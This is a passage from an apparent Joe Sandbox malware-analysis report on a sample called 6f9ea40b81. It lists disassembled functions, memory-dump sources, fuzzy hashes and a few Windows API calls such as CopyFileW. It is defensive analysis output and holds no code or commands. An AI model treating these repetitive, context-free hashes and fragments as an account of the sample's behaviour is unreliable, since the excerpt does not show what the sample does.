                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                                                                                                                                                                                                                                  Function 0042A060 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                                  • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                                                                                                                                                                                                                                  Function 00402B70 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                                                                                                                                                                                  • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                                                                                                                                                                                                                                  Function 0042B475 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                                                                                                                                                                                  • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                                                                                                                                                                                                                                  Function 0040C274 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                                                                                                                                                                                  • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                                                                                                                                                                                                                                  Function 00CE2200 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,7D89282A), ref: 00CE2590
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3712849131.0000000000CD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CD0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3712770273.0000000000CD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3715162072.0000000000F1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3715269568.0000000000F22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3715448864.0000000000F24000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_cd0000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                                  • String ID: Yw
                                                                                                                                                                                                                                                  • API String ID: 2050909247-3837857917
                                                                                                                                                                                                                                                  • Opcode ID: 71a2deb140b7808594432616f09a2239f01b048770eab2effa292a56f5817809
                                                                                                                                                                                                                                                  • Instruction ID: 0d502c6aea24a7460f9222274691d1a434a945c3225a5839ce1ab375d52cd57f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a2deb140b7808594432616f09a2239f01b048770eab2effa292a56f5817809
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8027C7690129D9BCB58CF59E8805EDBBF4FB58310F14816BE858E7250D338DA52EFA0
                                                                                                                                                                                                                                                  Function 00427546 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CopyFile
                                                                                                                                                                                                                                                  • String ID: B\$JC$OR
                                                                                                                                                                                                                                                  • API String ID: 1304948518-2992266057
                                                                                                                                                                                                                                                  • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                                                                                                                                                                                  • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A
                                                                                                                                                                                                                                                  Function 00F10546 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F10558
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F10567
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00F10570
                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00F1057D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3712849131.0000000000CD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CD0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3712770273.0000000000CD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3715162072.0000000000F1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3715269568.0000000000F22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3715448864.0000000000F24000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_cd0000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                  • Opcode ID: 88d44d8c0fe27027058a4759870e3b7bf4908a471fba6781b7971b03911a8f61
                                                                                                                                                                                                                                                  • Instruction ID: 003c9f983d0d7e0433025c565e84e9a7ceb0430e020acc725753d9b4cd82e44a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88d44d8c0fe27027058a4759870e3b7bf4908a471fba6781b7971b03911a8f61
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF05F74D5020DEBCB00DBB4D9499DEFBF4EF1C204B928596E412E6110E634AA44AB91